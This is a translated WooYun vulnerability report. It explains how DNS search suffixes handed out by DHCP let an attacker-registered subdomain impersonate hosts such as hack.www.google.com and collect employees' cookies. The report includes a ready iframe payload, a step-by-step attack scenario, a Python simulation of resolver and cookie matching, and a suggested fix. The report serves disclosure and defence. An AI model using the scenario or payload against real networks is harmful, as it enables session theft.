
Vulnerability summary (followers: 24)

Defect ID: wooyun-2011-02113

Vulnerability title: DNS suffix may lead to cross-domain and other security problems

Related vendor: OS

Author: 我勒个去

Submitted: 2011-05-13 12:03

Fixed: 2011-05-13 12:06

Published: 2011-05-13 12:06

Vulnerability type: Design error / logic flaw

Severity: Medium

Self-assessed Rank: 10

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2011-05-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public
2011-05-13: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

This design causes certain security problems. Tested successfully on Windows XP and Linux.

Detailed description:

We all know that a DHCP server can hand out a DNS suffix (search domain) to its clients. Suppose the suffix is set to "test.com". When a client on that network resolves a name such as www.xxx.com, it proceeds in the following order:
1. The system looks up www.xxx.com as given. If the DNS server returns an IP address, the client uses it.
2. Otherwise the system automatically appends the DNS suffix and tries again, this time for www.xxx.com.test.com. (This is only partly true: Windows 7 appends the suffix only to names that contain no '.'.) If that query returns an address, the program happily accepts it as the correct answer.
This is convenient, but it can cause problems, cross-domain access for example: the application asked for one name and transparently received the address of a different one, and nothing tells it which name actually answered. On glibc systems the order of the two steps is governed by the ndots option in /etc/resolv.conf (default 1): a name with at least ndots dots is tried as given first and the search list afterwards, so a multi-label name that does not exist still falls through to the suffixed lookup. Only a trailing dot (www.xxx.com.) marks a name as absolute and stops the search.

Proof of vulnerability:

Scenario:
1. Company A.COM provides second-level domain registration to its customers (e.g. a free blog service). People can register any username they like, for example test, and their space becomes test.A.com. This works fine.
2. The company's internal network uses a DHCP server that automatically hands out an A.COM DNS suffix to its clients.
An attacker who wants to collect employees' Gmail accounts can simply register a username like hack.www.google.com; the full domain name becomes hack.www.google.com.A.com.
When an A.com employee browses a web page containing an iframe such as
<iframe src="https://hack.www.google.com/accounts" >fuck it up</iframe>
the employee's system will
1. try to resolve hack.www.google.com and get a negative answer (NXDOMAIN);
2. then try hack.www.google.com.A.com and get the attacker's host IP address!
The browser knows nothing about this substitution: as far as it is concerned it is talking to a host under google.com, so it happily sends google.com cookies to the attacker's web server.
Two details decide what actually leaks. Only cookies whose Domain attribute covers a parent domain (Domain=.google.com) match the host hack.www.google.com; host-only cookies set for www.google.com do not. And with an https:// URL the attacker's server has to present a certificate the browser accepts for hack.www.google.com, otherwise the TLS handshake fails before any request, and hence any cookie, is sent; with a plain http:// URL, every matching cookie that lacks the Secure flag goes straight to the attacker.
Tested successfully on Windows XP and Ubuntu 11.04 with IE, Firefox and Chrome :) Failed on Windows 7 because it only appends the DNS suffix to names that contain no '.'.
GAME OVER!!!
Use your brains and think of more potential attack vectors!
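As an added illustration for the resolution order described above and for the cookie step of the scenario (this is not code from the report or from any operating system's resolver), the following Python models a stub resolver with a DHCP-supplied search list under both policies the report observed, and the RFC 6265 domain matching a browser applies to the host it asked for. The zone entries, addresses, search list and cookie jar are constructed for the example, and the https case assumes the attacker could complete the TLS handshake, which a real browser would refuse without a certificate valid for that name.

```python
"""Model of search-suffix resolution and of the cookie leak it enables.

Added illustration for this report, not code from the original page.
The zone, search list, cookie jar and addresses below are all constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed zone data: what the DNS would answer. Keys are lower-case FQDNs
# with a trailing dot; any other name gets NXDOMAIN (None).
ZONE: Dict[str, str] = {
    "www.google.com.": "203.0.113.10",            # placeholder address
    "test.a.com.": "10.0.0.5",                    # legitimate customer blog
    "hack.www.google.com.a.com.": "10.0.0.66",    # attacker-registered name
}


def dns_query(fqdn: str) -> Optional[str]:
    """Stand-in for a real lookup: an address, or None for NXDOMAIN."""
    key = fqdn.lower()
    if not key.endswith("."):
        key += "."
    return ZONE.get(key)


def resolve(name: str, search_list: List[str], ndots: int = 1,
            append_to_multilabel: bool = True) -> Tuple[Optional[str], Optional[str]]:
    """Resolve `name` like a stub resolver with a DHCP-supplied search list.

    Returns (address, name that actually answered) or (None, None).
    * A trailing dot marks the name as absolute; no suffix is ever appended.
    * glibc semantics: a name with at least `ndots` dots is tried as given
      first, then with each search suffix; fewer dots means suffixes first.
    * append_to_multilabel=False models the stricter policy the report saw on
      Windows 7, where suffixes are only added to names without a dot.
    """
    if name.endswith("."):
        return dns_query(name), name
    dots = name.count(".")
    suffixed = [f"{name}.{suffix}." for suffix in search_list]
    if dots > 0 and not append_to_multilabel:
        suffixed = []
    order = [name + "."] + suffixed if dots >= ndots else suffixed + [name + "."]
    for candidate in order:
        addr = dns_query(candidate)
        if addr is not None:
            return addr, candidate
    return None, None


@dataclass
class Cookie:
    name: str
    domain: str       # "google.com" for Domain=.google.com; the host for host-only
    host_only: bool   # True when Set-Cookie carried no Domain attribute
    secure: bool = False


def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 section 5.1.3 domain matching: equal, or a suffix on a label boundary."""
    host = request_host.lower().rstrip(".")
    dom = cookie_domain.lower().lstrip(".")
    return host == dom or host.endswith("." + dom)


def cookies_sent(jar: List[Cookie], request_host: str, scheme: str) -> List[str]:
    """Names of the cookies a browser would attach to a request for request_host."""
    sent = []
    for c in jar:
        if c.secure and scheme != "https":
            continue
        if c.host_only and request_host.lower() != c.domain.lower():
            continue
        if not c.host_only and not domain_matches(request_host, c.domain):
            continue
        sent.append(c.name)
    return sent


# Constructed cookie jar for the victim's browser.
JAR = [
    Cookie("SID", "google.com", host_only=False),                 # Domain=.google.com
    Cookie("HSID", "www.google.com", host_only=True),             # host-only cookie
    Cookie("SSID", "google.com", host_only=False, secure=True),   # Secure flag set
]


def leak_scenario(append_to_multilabel: bool, scheme: str = "http"):
    """The report's attack: an iframe to hack.www.google.com on an A.com client.

    Returns (address, answering name, leaked cookie names), or None when the
    name does not resolve. Cookie scoping is evaluated against the host the
    browser asked for; the browser never learns that a suffix was appended.
    (scheme="https" ignores certificate validation, which would stop it.)
    """
    host = "hack.www.google.com"
    addr, answered = resolve(host, ["A.com"], ndots=1,
                             append_to_multilabel=append_to_multilabel)
    if addr is None:
        return None
    return addr, answered, cookies_sent(JAR, host, scheme)


if __name__ == "__main__":
    print("XP/glibc-style resolver:", leak_scenario(True))
    print("Win7-style resolver:    ", leak_scenario(False))
```

Running it shows the XP/glibc-style policy answering hack.www.google.com with the attacker's 10.0.0.66 via hack.www.google.com.A.com and attaching the Domain=.google.com cookie, while the host-only cookie for www.google.com is not matched and the Secure cookie stays home over http. The Windows 7-style policy never appends the suffix to a dotted name, so the iframe request simply fails. Note that on glibc raising ndots only changes the order of the two lookups; the suffixed lookup still happens after the NXDOMAIN, so ndots alone does not close this hole.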

Suggested fix:

Fix the resolver library: do not append search suffixes to names that already contain a dot (as Windows 7 does), or have applications use fully qualified names with a trailing dot. On the network side, do not hand out a DNS suffix under which untrusted parties can create names, and a hosting service should not let customers register names containing dots that shadow other organizations' hostnames.

Copyright notice: when reposting, please credit the source: 我勒个去@乌云


Vulnerability responses

Vendor response:

Vendor could not be contacted, or vendor actively refused

Vulnerability Rank: 10 (WooYun rating)